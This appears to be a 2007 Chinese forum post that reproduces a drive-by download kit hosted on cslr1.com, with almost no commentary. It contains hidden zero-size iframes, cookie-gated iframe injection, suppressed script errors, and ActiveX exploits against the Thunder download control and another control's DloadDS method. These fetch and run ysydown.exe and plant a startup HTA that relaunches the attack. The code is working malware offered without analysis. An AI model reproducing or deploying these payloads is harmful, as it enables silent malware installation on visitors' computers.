<iframe src=http://xxx.cslr1.com/htm1.htm width=0 height=0></iframe>
<iframe width='100' height='100' src='ie1.htm'></iframe>
<iframe width='100' height='100' src='ie2.htm'></iframe>
<iframe width='100' height='100' src='ie3.htm'></iframe>
<iframe width='100' height='100' src='ie4.htm'></iframe>
<iframe width='100' height='100' src='ie5.htm'></iframe>
<iframe width='100' height='100' src='ie6.htm'></iframe>
http://xxx.cslr1.com/ie1.htm
<script language=javascript src=http://xxx.cslr1.com/cookies.js></script>
http://xxx.cslr1.com/cookies.js
document.writeln("<script>");
document.writeln("function Kao_Kaspersky(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=100 height=100 src=\"http:\/\/zzz.cslr1.com\/bf.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("Kao_Kaspersky();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")
http://xxx.cslr1.com/ie2.htm
<SCRIPT src="webxl.js"></SCRIPT>
http://xxx.cslr1.com/webxl.js
var Sofzl_cn = null
;function shit()
{
try{Sofzl_cn = new ActiveXObject("ThunderServer.webThunder.1");}
catch(e){return;}
var Sofzl;
Sofzl="<script defer> var Sofzlcn=\"<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var Sofzlcn=new ActiveXObject(\\\"wscript.shell\\\");Sofzlcn.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE http://xxx.cslr1.com/Webxls.htm\\\",0,0);function runmm(){var path=Sofzlcn.Specialfolders(\\\"MyDocuments\\\");var Qq275756717=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));Qq275756717+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";var Sofzl2=new ActiveXObject(\\\"Sofzlcn.application\\\");var Sofzl3=Sofzl2.NameSpace(Qq275756717);for(i=0;i<Sofzl3.Items().Count;i++){var Folder=Sofzl3.Items().Item(i).path;Folder+=\\\"\\\\\\\\ysydown[1].exe\\\";try{Sofzlcn.exec(Folder);}catch(e){};}window.close();};Sofzlcn.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);runmm();<\\/script></body></html>\";var wwwsofzlcn = new ActiveXObject(\"ADODB.Recordset\");wwwsofzlcn.Fields.Append(\"wwwsofzlcn\", 200, 3000);wwwsofzlcn.Open();wwwsofzlcn.AddNew();wwwsofzlcn.Fields(\"wwwsofzlcn\").Value=Sofzlcn;wwwsofzlcn.Update();wwwsofzlcn.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「开始」菜单\\\\程序\\\\启动\\\\microsofts.hta\",0);wwwsofzlcn.Close();</script>";
var ret=Sofzl_cn["AddCateogry"](Sofzl);
Sofzl_cn["SetBrowserWindowSize"](0,0,400,300);
var Seven = Sofzl_cn["GetServerPath"]();
Seven = Seven["substr"](0, Seven["length"]-1);
Seven+="\\page\\index.htm";
Sofzl_cn.SetBrowserWindowData(Seven,"wwwsofzlcn");
Sofzl_cn.HideBrowserWindow(1);
return;
}
http://xxx.cslr1.com/ie3.htm
<SCRIPT LANGUAGE='JavaScript'>
<!--
function ResumeError() {
return true;
}
window.onerror = ResumeError;
// -->
</SCRIPT>
<script>document.writeln("<html><head><script>function LoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVC(){chenzi[\"DloadDS\"]
(\"http://xxx.cslr1.com/ysyupdate.cab\",\"ysydown.exe\",0);}<\/script><\/head><OBJECT ID=\"chenzi\" cLaSsId=\"cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9}\"><\/OBJECT><script>LoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVC()<\/script><\/html>");</script>
[ 本帖最后由 a256886572008 于 2007-10-12 14:25 编辑 ] |
发表于 2007-10-12 13:59:19
楼主
发表于 2007-10-12 14:38:30